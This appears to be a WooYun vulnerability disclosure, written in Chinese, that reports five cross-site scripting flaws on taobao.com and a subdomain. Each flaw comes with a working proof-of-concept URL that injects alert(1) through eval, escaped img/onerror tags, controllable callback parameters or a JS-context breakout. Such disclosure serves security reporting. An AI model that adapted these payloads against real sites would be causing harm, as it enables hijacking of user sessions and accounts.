WooYun.org

1. eval导致的dom xss
http://www.taobao.com/go/act/sns/ui.php?name=alert(1)&ui=%7Bwidth%3A130%2Cheight%3A60%7D&tiaocfg=%7Bsource%3A%22module%22%2CmoduleId%3A%2210%22%2Citems%3A%5B%7Bid%3A%2212877916061%22%2Cpic%3A%22%22%7D%5D%7D&Sharecfg=%7B%7D&callback=%7Binit%3A%22xdcb_sns87fcf3117670a_parent%22%2Chide%3A%22xdcb_snsb1490bea6fc62_parent%22%2Cshow%3A%22xdcb_sns3a2ea08a237c7c_parent%22%7D&_iframe_id=%22sns1cfb66c62805a9%22
name的值被传入了eval中。

2. \ 未过滤，并动态输出至页面，导致xss.
http://www.taobao.com/view_image.php?pic=Wx0GGlFDXA1VUwMDWx0SCwkNGRFcVxxQW1UcCxMFRBkDCFdVV1cRRhpVRDhHEVp3YmtTbngxKgslQh0XDGsDB0FbR1NFBgYV&title=ob7Qx9S3w%2FvXsaG%2FID%2FQwsTvuvOw67PMuPrXsT8gMjAwfjYwMNSq&version=2&c=ZGY0YmE1MWYzODZiMDU3NWYxZTYyNzYxNDFjZGZiZjM%3D&itemId=\x22\x3e\x3cimg\x20src=1\x20onerror=alert(1)\x3e\x3ci\x20a=\x22pkavoverx&shopId=34423124&sellerRate=28&dbId=&fv=9
itemId未过滤 \ .

3. 调用外部JS时，参数被控，导致多处xss
http://www.taobao.com/go/act/sale/danpin660x90-0813.php?p4p=alert(1);pkavover
http://www.taobao.com/go/act/sale/danpin190x300-0809.php?p4p=alert(1);pkavover
http://www.taobao.com/go/act/sale/danpin336x280-02.php?p4p=alert(1);pkavover
http://www.taobao.com/go/act/sale/tbkelite_mainchannel1.php?callback=alert(1);pkavover
http://www.taobao.com/go/act/danpin300x250ceshi0915.php?p4p=alert(1);pkavover
可以看到调用的外部JS使用了 p4p参数, p4p参数可控

调用的外部JS文件的p4p参数，修改为alert(1);gainover 即注入了我们自己的JS代码。

4. 参数未过滤，导致XSS, 仅IE下有效 ：(
http://www.taobao.com/go/act/try/widget-iframe.php?widget=0&type=32&status=1&tag=%BD%F0%B1%D2&sort=buyStatus_startTime&maxNum=50&pic=160&width=740&height=1200&layout=1&pt=%22%3E11111%3Cscript defer%3Ealert(1)%3C/script%3E&pl=20&btn1=skin01&btn2=skin03&btn3=skin06&randomNum=54776&gold=1&btnText=%E5%85%A8%E9%A2%9D%E5%85%91%E6%8D%A2

5. 还有一枚子域名下的，参数未过滤，出现在js context下。
http://member1.taobao.com/member/autoReglogin/auto_reglogin.htm?reg_type=0&is_need_login=true&is_need_reg=true&from=autoReglogin&dis_title=false&callback=TB.app.FastBuy.DoAuth&auto_iframe_height=a;alert(1)}catch(e){}};alert(1);function aa(){try{eval
本来还有其它两处的，貌似时间久了，已经修复啦～～